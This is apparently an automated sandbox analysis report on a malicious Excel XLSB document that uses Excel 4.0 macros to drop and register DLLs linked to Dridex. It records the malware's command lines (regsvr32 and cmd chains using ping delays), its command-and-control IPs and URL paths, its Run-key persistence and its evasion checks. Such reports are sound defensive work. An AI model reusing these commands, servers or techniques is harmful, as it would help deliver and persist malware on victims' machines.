Analysis Report Documents_13134976_1377491379.xlsb

Overview

General Information

Sample Name: Documents_13134976_1377491379.xlsb
Analysis ID: 431937
MD5: 276bf3db434b887bb77adca0bd46e130
SHA1: eee2be9136f2c70a28b6ca5289e73e2a38453da2
SHA256: 27180043ebeb8f2aa8728c5ee020fb5368be3df4e9008b8f01242bf82d5780ce
Tags: xlsb, xlsx

Detection

Hidden Macro 4.0
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Creates an autostart registry key pointing to binary in C:\Windows
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
Tries to load missing DLLs
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Xls With Macro 4.0

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6528 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6796 cmdline: regsvr32 -s ..\iepfusn.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • regsvr32.exe (PID: 6848 cmdline: -s ..\iepfusn.dll MD5: D78B75FC68247E8A63ACBA846182740E)
        • cmd.exe (PID: 6980 cmdline: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
          • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • PING.EXE (PID: 7032 cmdline: ping 8.8.7.7 -n 2 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
          • regsvr32.exe (PID: 5712 cmdline: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR MD5: D78B75FC68247E8A63ACBA846182740E)
            • cmd.exe (PID: 1724 cmdline: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 1808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 6196 cmdline: ping 8.8.7.7 -n 2 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
              • regsvr32.exe (PID: 6356 cmdline: C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG MD5: D78B75FC68247E8A63ACBA846182740E)
                • cmd.exe (PID: 6896 cmdline: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
                  • conhost.exe (PID: 5680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
                  • PING.EXE (PID: 6092 cmdline: ping 8.8.7.7 -n 2 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
                  • regsvr32.exe (PID: 6824 cmdline: C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 6872 cmdline: 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB MD5: D78B75FC68247E8A63ACBA846182740E)
  • regsvr32.exe (PID: 400 cmdline: 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source   Rule                       Description                       Author        Strings
app.xml  JoeSecurity_XlsWithMacro4  Yara detected Xls With Macro 4.0  Joe Security  (none)

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load
Source: Process started | Author: Florian Roth | Data: Command: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG, CommandLine: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, ParentImage: C:\Windows\System32\regsvr32.exe, ParentProcessId: 5712, ProcessCommandLine: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG, ProcessId: 1724
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: regsvr32 -s ..\iepfusn.dll, CommandLine: regsvr32 -s ..\iepfusn.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6528, ProcessCommandLine: regsvr32 -s ..\iepfusn.dll, ProcessId: 6796
Sigma detected: Regsvr32 Anomaly
Source: Process started | Author: Florian Roth, oscd.community | Data: Command: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, CommandLine: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6980, ProcessCommandLine: C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR, ProcessId: 5712

Signature Overview

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: unknown | HTTPS traffic detected: 107.180.50.232:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49750 version: TLS 1.2
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_00007FFD696B3714 FindFirstFileExA,
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00007FFD69653714 FindFirstFileExA,

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\iepfusn.dll
Document exploit detected (drops PE files)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: rtdsgfe[1].dll.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Section loaded: unknown origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe
Source: global traffic | DNS query: name: tpfcu.com
Source: global traffic | TCP traffic: 192.168.2.6:49715 -> 107.180.50.232:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 18.117.84.120:443 -> 192.168.2.6:49740
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 18.117.84.120:443 -> 192.168.2.6:49747
Source: Traffic | Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 18.117.84.120:443 -> 192.168.2.6:49750
Uses ping.exe to check the status of other devices and networks
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
Source: Joe Sandbox View | ASN Name: MIT-GATEWAYSUS MIT-GATEWAYSUS
Source: Joe Sandbox View | JA3 fingerprint: 8916410db85077a5460817142dcbc8de
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | TCP traffic detected without corresponding DNS query: 18.117.84.120 (this line is repeated 22 times in the report)
Source: unknown | DNS traffic detected: queries for: tpfcu.com
Source: regsvr32.exe, 00000019.00000003.540484196.0000000000AAC000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000019.00000003.467970862.0000000000B0D000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/
Source: regsvr32.exe, 00000019.00000003.540484196.0000000000AAC000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.25.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000019.00000003.467970862.0000000000B0D000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?c71b863b5b2fa
Source: regsvr32.exe, 00000019.00000002.634452908.0000000000A78000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en9
Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.dr | String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmp | String found in binary or memory: https://18.117.84.120/
Source: regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmp | String found in binary or memory: https://18.117.84.120/#
Source: regsvr32.exe, 00000019.00000002.636067995.00000000029E5000.00000004.00000001.sdmp | String found in binary or memory: https://18.117.84.120/18.188.86.8/
Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmp | String found in binary or memory: https://18.117.84.120/89b
Source: regsvr32.exe, 00000019.00000002.634433415.0000000000A6E000.00000004.00000020.sdmp, regsvr32.exe, 00000019.00000002.634483097.0000000000A9A000.00000004.00000020.sdmp | String found in binary or memory: https://18.117.84.120/kenichi/special21new/trailer2a5
Source: regsvr32.exe, 00000019.00000002.634500391.0000000000AAC000.00000004.00000020.sdmp | String found in binary or memory: https://18.117.84.120/kenichi/special21new/trailer2a5T0
Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmp | String found in binary or memory: https://18.188.86.8/
Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmp | String found in binary or memory: https://18.188.86.8/Z
Source: regsvr32.exe, 00000019.00000002.634500391.0000000000AAC000.00000004.00000020.sdmp | String found in binary or memory: https://18.188.86.8/kenichi/special21new/trailer2a5
Source: regsvr32.exe, 00000019.00000002.634565601.0000000000AFD000.00000004.00000020.sdmp | String found in binary or memory: https://18.188.86.8/railer2a55b
Source: regsvr32.exe, 00000019.00000002.636079030.0000000002A44000.00000004.00000001.sdmp | String found in binary or memory: https://18.188.86.8:443/kenichi/special21new/trailer2a55
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://store.office.cn/addinstemplate
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://store.office.com/addinstemplate
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://store.office.de/addinstemplate
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://tasks.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://templatelogging.office.com/client/log
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://web.microsoftstream.com/video/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://webshell.suite.office.com
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://wus2.contentsync.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://wus2.pagecontentsync.
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
    Source: 2CA63FBD-E4D0-4324-9237-CB578953FC60.0.drString found in binary or memory: https://www.odwebp.svc.ms
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknown | HTTPS traffic detected: 107.180.50.232:443 -> 192.168.2.6:49715 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49740 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49747 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 18.117.84.120:443 -> 192.168.2.6:49750 version: TLS 1.2

    System Summary:

    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
    Source: Screenshot number: 8 | Screenshot OCR: Enable editing " to unlock the editing document downloaded from the ir 13 " 14 PROTECTED VIEW Th
    Source: Screenshot number: 8 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start : '8 the decryption of documen
    Source: Screenshot number: 12 | Screenshot OCR: Enable editing " to unlock the editing document downloaded from the ir 13 " 14 PROTECTED VIEW Th
    Source: Screenshot number: 12 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start : '8 the decryption of documen
    Source: Screenshot number: 16 | Screenshot OCR: Enable editing " to unlock the editing document downloaded from the Internet. PROTECTED VIEW This f
    Source: Screenshot number: 16 | Screenshot OCR: Enable content" to perform Microsoft Office Decryption Core to start the decryption of document. E
    Found Excel 4.0 Macro with suspicious formulas
    Source: Documents_13134976_1377491379.xlsb | Initial sample: CALL
    Source: Documents_13134976_1377491379.xlsb | Initial sample: EXEC
    Source: Documents_13134976_1377491379.xlsb | Initial sample: CALL
    Office process drops PE file
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\iepfusn.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll
    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
    Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\L3YD7CE.dll 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
    Source: Joe Sandbox View | Dropped File: C:\Users\user\iepfusn.dll 67E54B44DAD909734A59DF457950C05727B7ECF387F1F37C38C18CEF5AF579C2
    Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
    Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
    Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSB@28/13@1/4
    Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_012D4554 CreateToolhelp32Snapshot,Process32First,FindCloseChangeNotification,Process32Next,
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache
    Source: C:\Windows\System32\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\NFIRRWAVEQLJNKX7G17J1Q
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6988:120:WilError_01
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5680:120:WilError_01
    Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1808:120:WilError_01
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\{4F0D64AE-B9BF-48DC-A1ED-DB4CEC735B81} - OProcSessId.dat
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File read: C:\Users\desktop.ini
    Source: C:\Windows\SysWOW64\regsvr32.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: C:\Windows\System32\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
    Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\iepfusn.dll
    Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe -s ..\iepfusn.dll
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\iepfusn.dll RV0KR
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll N8DG
    Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\cmd.exe cmd /c ping 8.8.7.7 -n 2 & start C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
    Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\L3YD7CE.dll VE50DB
    Source: Window Recorder | Window detected: More than 3 window changes detected
    Source: Documents_13134976_1377491379.xlsb | Initial sample: OLE zip file path = xl/media/image1.png
    Source: Documents_13134976_1377491379.xlsb | Initial sample: OLE zip file path = xl/media/image2.png
    Source: Documents_13134976_1377491379.xlsb | Initial sample: OLE zip file path = xl/media/image3.png
    Source: Documents_13134976_1377491379.xlsb | Initial sample: OLE zip file path = xl/media/image4.png
    Source: Documents_13134976_1377491379.xlsb | Initial sample: OLE zip file path = xl/media/image5.png
    Source: Documents_13134976_1377491379.xlsb | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Windows\System32\regsvr32.exe | File created: C:\Users\user\AppData\Local\Temp\L3YD7CE.dll

    Boot Survival:

    Creates an autostart registry key pointing to binary in C:\Windows
    Source: C:\Windows\System32\regsvr32.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run FX11S05YSR
    Drops PE files to the user root directory
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | File created: C:\Users\user\iepfusn.dll
    Source: C:\Windows\System32\regsvr32.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

    Malware Analysis System Evasion:

Uses ping.exe to sleep
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\rtdsgfe[1].dll
Source: C:\Windows\System32\regsvr32.exe TID: 6852 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 5704 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 6880 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 6880 | Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 6848 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 6816 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 3252 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\PING.EXE | Last function: Thread delayed
Source: C:\Windows\System32\regsvr32.exe | Last function: Thread delayed
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_00007FFD696A9D9D GetKeyboardLayoutNameW followed by cmp: cmp ebp, ecx and CTI: je 00007FFD696AA100h
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00007FFD69649D9D GetKeyboardLayoutNameW followed by cmp: cmp ebp, ecx and CTI: je 00007FFD6964A100h
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_00007FFD696B3714 FindFirstFileExA,
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00007FFD69653714 FindFirstFileExA,
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 30000
Source: C:\Windows\System32\regsvr32.exe | Thread delayed: delay time: 60000
Source: regsvr32.exe, 00000019.00000003.540484196.0000000000AAC000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWt
Source: regsvr32.exe, 00000019.00000003.540484196.0000000000AAC000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: regsvr32.exe, 0000001A.00000002.465899187.000000000101D000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll]]N
Source: regsvr32.exe, 0000001B.00000002.482209725.0000000000BB8000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\regsvr32.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_00007FFD696B31A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_00007FFD696A4402 GetProcessHeap,HeapAlloc,GetProcessHeap,RtlAllocateHeap,
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_00007FFD696B03CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_00007FFD696AFC50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00007FFD696531A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00007FFD696503CC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\regsvr32.exe | Code function: 11_2_00007FFD6964FC50 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

    HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 18.117.84.120 187
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping 8.8.7.7 -n 2
